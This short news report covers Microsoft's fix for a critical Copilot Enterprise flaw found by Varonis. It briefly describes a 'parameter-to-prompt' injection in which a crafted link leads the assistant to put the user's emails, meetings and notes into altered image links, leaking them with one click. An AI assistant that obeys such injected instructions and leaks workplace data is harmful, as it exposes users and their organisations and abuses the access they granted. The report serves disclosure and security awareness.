Microsoft fixes Copilot Enterprise flaw that exposed workplace data

Technology Jun 17, 2026

A major security flaw in Microsoft's Copilot Enterprise chatbot meant hackers could grab sensitive information, like emails and notes, with just a single click.
The trick worked through a parameter-to-prompt (P2P) injection, where attackers sent links that made Copilot pull user data into altered image links.
Microsoft called it "critical" and has since fixed it.

Varonis warns companies on AI security

This bug let hackers use whatever permissions you had at work, so anything you could access (emails, meetings, and notes) was up for grabs.
Researchers from Varonis warned that flaws like this show why companies need to be careful with AI tools and set up solid protections, or risk major data leaks.